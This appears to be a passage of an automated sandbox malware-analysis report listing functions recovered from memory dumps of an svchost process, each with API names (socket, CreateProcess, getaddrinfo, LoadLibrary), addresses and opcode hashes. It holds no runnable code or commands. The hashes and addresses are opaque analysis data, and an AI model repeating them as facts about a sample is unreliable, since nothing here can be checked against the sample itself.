                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2368903962.0000018B293B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018B293B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_18b293b0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                                                                                                                                                                                                              • Instruction ID: c45a8555a53d17de46f15d807220118880163e17f125ce7bedd5dee36b8a2d0f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CC1833025CB098FDB58EF28C495BA9B7E1FB98350F00851DE48EC7256DF34E9558B82
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F6984 Relevance: 1.9, APIs: 1, Instructions: 367timeCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Timer$CreateQueue
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3971536239-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                                                                                                                                                                                                              • Instruction ID: 61955788911c74da91213869f81006c0d7290fdd0ac8698da7069531861bcb36
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BB19030A1DA488FF765EF69A8596A773E1FB94314F50462FD06BC21A1EF38A442C781
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F9BA4 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CreateFileMapping
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 524692379-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 38ed80a8610287eaf0cb070ba813994c1d888dc4fc42385cae5d3e2e87e9bf68
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CB1813160CA888FE759EF69D4946ABB7E1FF94304F504A2EE09FC3291DA34E445CB81
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE639A44 Relevance: 1.8, APIs: 1, Instructions: 269networkCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: socket
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                                                                                                                                                                                              • Instruction ID: 777eda56447fa3ae1ff0600bca2f1fc2d7ad9cf0e2a053178401c0a2f8026992
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B91A070618E4A8FEB94DF2DC4886A677F0FF04319FA0056AD45FC66A5EB39E841CB50
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E2514 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4294550b5a9d188f863f2fd63fa68e9406f0c85333e3941499bc8d4f5d85d3dc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17511830A1DE4D4FFB55ABADA56832B72E1FB98344F10013BE45FC7198EE68D8818781
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F5870 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2039140958-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                                                                                                                                                                                              • Instruction ID: 67666f4955620916177ee77104eb54031c2f295070acaf4da93cb756814518a0
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D618B3090C6888BE765EF65D9946EBB7E1FB94304F404A2FE08FC3191DE38A645CB42
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE610BC4 Relevance: 1.7, APIs: 1, Instructions: 184processCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                                                                                                                                                                                              • Instruction ID: 10cc6b2bc45d9283c2974741ac7b714d85a16a71ad05d8b056953b70ca4d3ccc
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F51743060E7848FEBA5DB19D85576BB7F5FF98314F40192EE49AC3291DB74E8018B42
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F84B4 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF4AE5F37B8), ref: 00007DF4AE5F85F1
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 3978063606-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                                                                                                                                                                                                              • Instruction ID: 3bb3c0c9080a39a8891e5481cf6f3229023946536a69bdd7e318d67b1f743277
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f566a557f405a15e9f60543e31327f656da7bfedb9a26ca6cc3cf471634a3ab7
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72419730B099884FFB58EBA9A5A556F73A1FF54705B044527E42FC72C6DA38F8018781
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F36BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                                                                                                                                                                              • Instruction ID: aa6c32d420bd2c6db5ad1795406172c3c75bbcb58fe7fa8a2e8937fa8cd4a8c5
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51318721F1E5845BFB9CFBA9E9A257B73F2EF44308B50043AD02FC32D2D918AD458681
                                                                                                                                                                                                                                                                                                              Function 0000018B292A1870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.2739348169.0000018B292A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018B292A0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_18b292a0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                                                              • Instruction ID: 59279f631825485449a0c72f446a4edc15f906be5b39ac1fb32abcec1a675af6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2431CA32148A274AEBAD976A84D4BF9F2D2EB843B0F1481A9C019D30D2EF35E64DC740
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE639878 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • socket.WS2_32(?,?,?,?,?,?,?,?,0000006B,0000006A,-00000002,00007DF4AE639999), ref: 00007DF4AE6398A5
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: socket
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                                                                                                                                                                              • Instruction ID: 25c1cafb58302330bdb3cb8ed5469c017b37040e6ebf24bc9cc9c8ce131ca71b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7621B9307099054FE748AB39D8882A773E1EB95329F501A7AD83FC23D6DA389C024B51
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F6748 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: getaddrinfo
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 300660673-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7814816d302508b0a6c278aa5db86e2971ce6de52c3c38c7691434871d02f696
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9316B70609A898FEB54DF25D8A8A5773E1FF98708F10016DD85FD7291CB39E802CB81
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE638420 Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: socket
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                                                                                                                                                                              • Instruction ID: 0c0dd2a8079e5ade565a4e921be855e0d3029bd69e9202272ab562ed7dfb9c2f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C911BB3470994A4FE6549B69D9847E772F1FB48319F94593AE42FC27C3DB28AC078340
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60A38C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                                                                                                                                                                                                              • Instruction ID: 8240284dce16d80105123fd27b931791adf1ad99057f4e08504c5b71559995f8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51218E30609A088FDF94EF68D849A9A77E1FF98315F00462AB81ED3191DA39E8418B91
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E2B48 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                                                                                                                                                                                              • Instruction ID: bd961ba175f6bcc8dc9af8736371d8edd8b42c1662230812e343c9709fa648e7
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3861752e6b5c76be2cebb9ad67872b18419a5ea734a6e2a755e753fd2cd8f93e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E01D630A159098FEB54EB6DEC9862673EAFBCC315B444075E81EC7148DA76AC81CB90
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE638374 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: closesocket
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2781271927-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                                                                                                                                                                                                              • Instruction ID: 64461c98fba4169eb0ee7e1dced314447a54726f33dae0b63dcd48a6ab5b58bf
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88f570aa19942cbceb8937b7800559f16cfa9926cc3a62739dcadfc924c76aed
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6017C30901A498FEB84CF59C4C87A13AE4EF54329F8424A6DC1ACA29AD378D890C780
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E2D94 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                                                                                                                                                                                              • Instruction ID: d932da0acf368572747abcb0cafa707fa49d882f82dfe4581da71e18e3cfb748
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f69c4423fc2f9dc24249204a85e6f753c59304eed0840573d92f1e176759654c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF0A0A5E0A5488BF714ABBF7E9026731E1AB84328F14463BD62FC2585D97988C25250
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F3424 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: AddressCallerProc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2663294120-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4b27fdd158032546b592566dcbe749f4a842a0f47fdf0f066a641a450639a2fd
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b55f2987ccf9d47b878492792b43a4e8323f4fb48d1ec303df731e7bfe889620
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01E0C211F09C0D1B7B6862EF649C57765D6DBDC136304027BE82DC3295EC14CC810380
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE610DCC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                                                                                                                                                                                              • Instruction ID: 185d46c588ea2e4567bcae6b34181abe55dfdcdb206542bcc00ac7c0aea2c954
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c721ddc8cb176db938021c85e5f400d5d7596dc62bee08ed1c2796866c985cb
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93E0C232B191240BE72C6ABD2C8917A36CAC7CC572B06827BFC06C3284DC68CC5602D0
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F33F8 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                              • Instruction ID: b35c5989e1d5593ffed44b6ab70aade40fefb8703060fb6e83d16a850cee80b8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35D0A710725D0D0BFA4D677EACA872771D5EBDC325F54017BF41EC2281E958CC550300
